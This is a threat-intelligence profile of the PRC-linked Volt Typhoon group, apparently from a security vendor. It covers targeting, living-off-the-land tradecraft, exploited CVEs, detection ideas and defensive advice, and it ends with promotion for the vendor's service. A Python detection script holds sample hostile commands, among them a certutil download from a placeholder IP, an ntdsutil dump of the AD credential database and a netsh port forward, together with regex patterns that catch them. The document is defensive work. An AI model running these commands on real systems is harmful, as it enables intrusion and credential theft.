Volt Typhoon
PRC State-Sponsored Actor Pre-Positioning in U.S. Critical Infrastructure
Volt Typhoon is a PRC state-sponsored threat actor that has maintained persistent access to U.S. critical infrastructure networks for over five years. Unlike traditional espionage-focused APTs, their primary objective is pre-positioning for potential disruption or destruction during a future geopolitical crisis—particularly a conflict over Taiwan.
Attribution & Identity
Volt Typhoon is assessed with high confidence to be a People's Republic of China (PRC) state-sponsored cyber actor. This assessment is based on joint advisories from CISA, NSA, FBI, and Five Eyes partners, as well as a reported admission by Chinese officials at a December 2024 Geneva summit confirming cyberattacks against U.S. infrastructure in response to U.S. support for Taiwan.
Unlike traditional espionage-focused APTs, Volt Typhoon's primary objective is pre-positioning within critical systems to enable potential disruption or destruction during a future geopolitical crisis. The group is distinguished by its extensive use of living-off-the-land (LOTL) techniques, avoiding custom malware in favor of native system tools that blend with normal administrative activity.
They heavily abuse compromised SOHO routers and edge devices to proxy their traffic and obscure their origin. In December 2025, congressional testimony confirmed that Volt Typhoon continues actively targeting U.S. power grid systems.
Targeting Profile
Volt Typhoon's targeting is strategically focused on systems that would be critical during a military conflict, particularly those supporting U.S. force projection in the Pacific theater.
🎯 Target Sectors
- Communications / Telecom
- Energy / Utilities
- Water & Wastewater
- Transportation
- Maritime / Ports
- Manufacturing
- Government
- Information Technology
🌍 Target Regions
- United States (Primary)
- Guam (Critical Focus)
- U.S. Pacific Territories
- Australia (Confirmed)
- Allied Nations
💻 Target Technologies
- Fortinet FortiOS/FortiGate
- Ivanti Connect Secure
- Versa Director
- SOHO Routers (Various)
- Active Directory
- SCADA/ICS Systems
- OT Networks
Strategic Intent: Taiwan Contingency
The U.S. government assesses that Volt Typhoon's goal is to slow or prevent a U.S. military response to a potential Chinese invasion of Taiwan by disrupting critical infrastructure. Their focus on Guam, a key military staging point, underscores this assessment. Some environments have been compromised for over 5 years, with a focus on obtaining access to OT/SCADA systems and documentation.
Signature Tradecraft: Living Off The Land
Volt Typhoon is notable for avoiding custom malware, instead relying on native system tools. This makes detection extremely difficult as their activity blends with legitimate administrative operations.
| Tool | Purpose | Detection Challenge |
|---|---|---|
| cmd.exe | Command execution | Ubiquitous system tool |
| powershell.exe | Scripting, enumeration | Legitimate admin use |
| wmic.exe | Remote execution, discovery | Common management tool |
| ntdsutil.exe | AD database extraction | Legitimate AD admin tool |
| netsh.exe | Firewall, port forwarding | Network administration |
| certutil.exe | File download, encoding | Certificate management |
| 7-Zip | Archive with password | Common compression tool |
⌨️ Hands-on-Keyboard Activity
Volt Typhoon operators conduct real-time, hands-on intrusions rather than deploying automated scripts. This makes their activity harder to detect but also slower and more deliberate.
MITRE ATT&CK Techniques
Initial Access
- Exploit Public-Facing Application T1190
- External Remote Services T1133
Execution
- PowerShell T1059.001
- Windows Command Shell T1059.003
- WMI T1047
Persistence
- Valid Accounts T1078
- Scheduled Task T1053.005
Defense Evasion
- System Binary Proxy Execution T1218
- Indicator Removal T1070
- Masquerading T1036
Credential Access
- NTDS T1003.003
- LSASS Memory T1003.001
- Password Stores T1555
Lateral Movement
- Remote Desktop T1021.001
- SMB/Windows Shares T1021.002
- WinRM T1021.006
Command & Control
- External Proxy T1090.002
- Protocol Tunneling T1572
Collection
- Archive via Utility T1560.001
- Local Data T1005
Exploited Vulnerabilities
Volt Typhoon heavily targets network edge devices, particularly from Fortinet, Ivanti, and Versa. Organizations using these products should prioritize patching.
| CVE | Product | Type | CVSS |
|---|---|---|---|
| CVE-2024-39717 | Versa Director | File Upload (Zero-Day) | 7.2 |
| CVE-2024-21762 | Fortinet FortiOS SSL VPN | Out-of-Bounds Write | 9.8 |
| CVE-2024-23113 | Fortinet FortiOS | Format String | 9.8 |
| CVE-2023-27997 | Fortinet FortiOS | Buffer Overflow | 9.8 |
| CVE-2022-42475 | Fortinet FortiOS SSL VPN | Buffer Overflow | Critical |
| CVE-2022-40684 | Fortinet FortiOS | Auth Bypass | Critical |
| CVE-2024-21887 | Ivanti Connect Secure | Command Injection | 9.1 |
| CVE-2023-46805 | Ivanti Connect Secure | Auth Bypass | 8.2 |
Notable Campaigns
KV Botnet Campaign (C0035)
Compromise of end-of-life SOHO routers (Cisco RV320/325, NETGEAR, DrayTek Vigor) to create a botnet for proxying malicious traffic. The FBI disrupted the botnet in January 2024, but it was subsequently revived and remains active.
Versa Director Zero-Day (C0039)
Exploitation of the CVE-2024-39717 zero-day in Versa Director to deploy the VersaMem web shell against Internet Service Providers and Managed Service Providers, enabling downstream access to customer environments.
Critical Infrastructure Pre-Positioning
An ongoing campaign to establish and maintain persistent access to U.S. critical infrastructure. Some environments have been compromised for over 5 years, with a focus on obtaining access to OT/SCADA systems and documentation.
Detection & Response
Detection Opportunities
LOTL Tool Anomalies
- cmd.exe spawned by unusual parent processes
- PowerShell with encoded commands
- ntdsutil.exe creating IFM snapshots
- certutil.exe downloading files
- netsh port forwarding commands
Network Indicators
- Traffic to known compromised SOHO routers
- FRP (Fast Reverse Proxy) connections
- Unusual outbound connections from servers
- SMB lateral movement patterns
Authentication Anomalies
- Admin account "fortinet-tech-support"
- Off-hours domain admin activity
- Logons from unusual source IPs
- Service accounts with interactive logons
File System Artifacts
- .gif files containing archives (masquerading)
- Password-protected 7z archives
- NTDS.dit copies in unusual locations
- VersaMem web shell artifacts
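As an added example that is not part of this profile, the Python below runs the LOTL tool checks from the tradecraft table and the Detection Opportunities list above over process-creation records, and applies the .gif-extension masquerading check from the File System Artifacts list to file headers. The sample events and file bytes are constructed for this example, and the EXPECTED_CMD_PARENTS baseline is an assumption to be tuned per environment.

```python
"""LOTL process-event rules and archive-masquerading check (constructed sample data only)."""
import re

# Constructed process-creation events (Sysmon Event ID 1 / Security 4688 style), not page IOCs.
EVENTS = [
    {"parent": "winword.exe", "image": "cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"parent": "cmd.exe", "image": "ntdsutil.exe",
     "cmdline": 'ntdsutil.exe "ac i ntds" ifm "create full C:\\Windows\\Temp\\x" q q'},
    {"parent": "cmd.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.10/a.gif C:\\Windows\\Temp\\a.gif"},
    {"parent": "cmd.exe", "image": "netsh.exe",
     "cmdline": "netsh interface portproxy add v4tov4 listenport=9999 connectport=3389"},
    {"parent": "services.exe", "image": "svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
]
# (rule name, image name, case-insensitive regex over the command line)
RULES = [
    ("powershell_encoded_command", "powershell.exe", r"\s-(e|ec|enc|encodedcommand)\s"),
    ("ntdsutil_ifm_snapshot", "ntdsutil.exe", r"\bifm\b"),
    ("certutil_download_or_decode", "certutil.exe", r"-(urlcache|decode)\b"),
    ("netsh_portproxy", "netsh.exe", r"\bportproxy\s+add\b"),
]
# Assumed baseline of parents that normally launch cmd.exe; tune this per environment.
EXPECTED_CMD_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "services.exe"}

def match_rules(event):
    """Return the names of every rule the event triggers (empty list if nothing fires)."""
    hits = []
    image = event["image"].lower()
    if image == "cmd.exe" and event["parent"].lower() not in EXPECTED_CMD_PARENTS:
        hits.append("cmd_unusual_parent")
    for name, rule_image, pattern in RULES:
        if image == rule_image and re.search(pattern, event["cmdline"], re.IGNORECASE):
            hits.append(name)
    return hits

def scan_events(events):
    """Flatten all hits across a batch of events as (image, rule name) pairs."""
    return [(e["image"], h) for e in events for h in match_rules(e)]

# Archive signatures that may sit behind a harmless-looking .gif extension.
ARCHIVE_MAGIC = {b"7z\xbc\xaf\x27\x1c": "7z", b"PK\x03\x04": "zip", b"Rar!\x1a\x07": "rar"}

def masquerading_archive(name, header):
    """Return the archive type when a .gif-named file lacks a GIF header but has an archive one."""
    if not name.lower().endswith(".gif") or header[:6] in (b"GIF87a", b"GIF89a"):
        return None
    return next((kind for sig, kind in ARCHIVE_MAGIC.items() if header.startswith(sig)), None)
```

In production the event records would come from an EDR or SIEM export and the headers from a file-system sweep; the rules above are a starting point to baseline against legitimate admin activity, not a complete rule set.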
Defensive Recommendations
Patch Edge Devices Immediately
Prioritize Fortinet, Ivanti, and Versa vulnerabilities. These are primary initial access vectors.
Replace EOL SOHO Routers
Upgrade devices no longer receiving security updates. These are exploited for botnet infrastructure.
Implement Network Segmentation
Isolate OT/SCADA from IT networks. This limits blast radius if compromise occurs.
Monitor LOTL Tool Usage
Baseline and alert on administrative tool execution patterns to detect anomalies.
Enable Enhanced Logging
PowerShell script block logging, WMI, and process creation events are essential for detection.
Hunt for Long-Term Persistence
Assume compromise if running vulnerable devices. Proactively hunt for 5+ year dwell times.
Track Volt Typhoon with BRACE
BRACE delivers monthly sector-specific threat intelligence covering Volt Typhoon activity, including:
- Volt Typhoon campaign analysis and targeting patterns
- Detection rules for LOTL techniques and edge device compromise
- MITRE ATT&CK mappings for nation-state TTPs
- Sector-specific threat hunting playbooks
- IOCs and behavioral indicators
Protect Your Critical Infrastructure
BRACE delivers monthly threat intelligence on Volt Typhoon and 175+ threat groups with sector-specific detection rules, MITRE ATT&CK mapping, and hunting playbooks.